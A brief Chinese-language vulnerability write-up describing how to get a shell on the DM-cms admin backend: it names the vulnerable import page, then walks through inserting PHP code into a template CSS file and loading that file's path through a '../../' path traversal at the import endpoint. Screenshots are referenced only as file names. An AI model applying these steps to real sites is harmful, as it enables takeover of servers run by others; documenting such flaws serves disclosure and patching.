0%

DM-cms后台getshell

漏洞触发点

http://www.xxx.cn/admindm-yourname/mod_module/mod_importdata.php?lang=cn
1.jpg
我们先去模板管理—》模板管理
http://www.cc.com/admindm-yourname/mod_style/mod_style.php?lang=cn
2.jpg
点击修改css样式然后插入php代码,然后提交
3.jpg
复制这个路径然后回到,最初的漏洞触发点输入
5jpg.jpg
../../DM-static/assets/cssjstpl/style20160721_0855323118.css(之前复制的css文件路径)
6.jpg
点击提交
11.jpg